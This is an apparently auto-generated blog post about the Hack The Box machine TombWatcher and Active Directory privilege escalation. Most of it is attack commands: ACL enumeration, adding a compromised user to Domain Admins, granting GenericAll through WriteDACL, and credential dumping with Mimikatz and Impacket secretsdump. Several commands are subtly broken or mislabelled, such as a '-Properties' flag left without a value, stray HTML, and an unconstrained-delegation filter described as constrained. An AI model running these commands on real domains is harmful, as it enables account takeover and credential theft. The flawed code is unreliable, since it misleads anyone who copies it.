Listen to this Post
Luis Moret’s recent Hack The Box (HTB) challenge, TombWatcher, highlights advanced Active Directory (AD) exploitation techniques, particularly ACL (Access Control List) abuse and deep enumeration beyond BloodHound’s default visibility. The machine requires digging into hidden attack paths to uncover privilege escalation opportunities.
You Should Know:
1. ACL Abuse Commands
ACLs define permissions for AD objects. Attackers can exploit misconfigured ACLs to escalate privileges.
Enumerate ACLs of a target object (PowerShell)
Get-ADObject -Identity "CN=Target,OU=Users,DC=domain,DC=com" -Properties | Select-Object -ExpandProperty nTSecurityDescriptor
Check for GenericAll rights (PowerShell)
(Get-Acl "AD:\CN=Target,OU=Users,DC=domain,DC=com").Access | Where-Object { $_.ActiveDirectoryRights -like "GenericAll" }
Abuse GenericAll to add a user to a privileged group
Add-ADGroupMember -Identity "Domain Admins" -Members "CompromisedUser"
2. BloodHound Deep Enumeration
BloodHound may miss hidden relationships. Manual LDAP queries help uncover hidden paths:
LDAP query for sensitive users (Linux) ldapsearch -x -H ldap://domain.com -D "[email protected]" -w "password" -b "DC=domain,DC=com" "(adminCount=1)" Check for constrained delegation misconfigurations Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties<br />
3. Privilege Escalation via ACL Abuse
If a user has WriteDACL rights, they can modify ACLs to grant themselves privileges:
Grant yourself GenericAll rights
$acl = Get-Acl "AD:\CN=Target,OU=Users,DC=domain,DC=com"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule("CompromisedUser","GenericAll","Allow")
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\CN=Target,OU=Users,DC=domain,DC=com" -AclObject $acl
4. Post-Exploitation: Dumping Credentials
After gaining admin access, extract credentials:
Mimikatz (Windows) sekurlsa::logonpasswords Secretsdump (Impacket - Linux) secretsdump.py DOMAIN/user:password@target-ip
What Undercode Say:
ACL abuse remains a critical attack vector in AD environments. BloodHound provides a great starting point, but manual LDAP enumeration reveals hidden attack paths. Always check for:
– GenericAll, WriteDACL, and WriteOwner permissions
– Constrained/Unconstrained Delegation misconfigurations
– AdminCount=1 users (often legacy admins)
Expected Output:
Example: Finding users with AdminCount=1 ldapsearch -x -H ldap://domain.local -D "[email protected]" -w "Pass123" -b "DC=domain,DC=local" "(adminCount=1)" Output: dn: CN=AdminUser,OU=Admins,DC=domain,DC=local adminCount: 1
Prediction:
As AD environments grow more complex, automated tools like BloodHound will improve, but attackers will continue exploiting overlooked manual misconfigurations. Expect more ACL-based attacks in 2025.
Reference:
IT/Security Reporter URL:
Reported By: Luis Moret – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
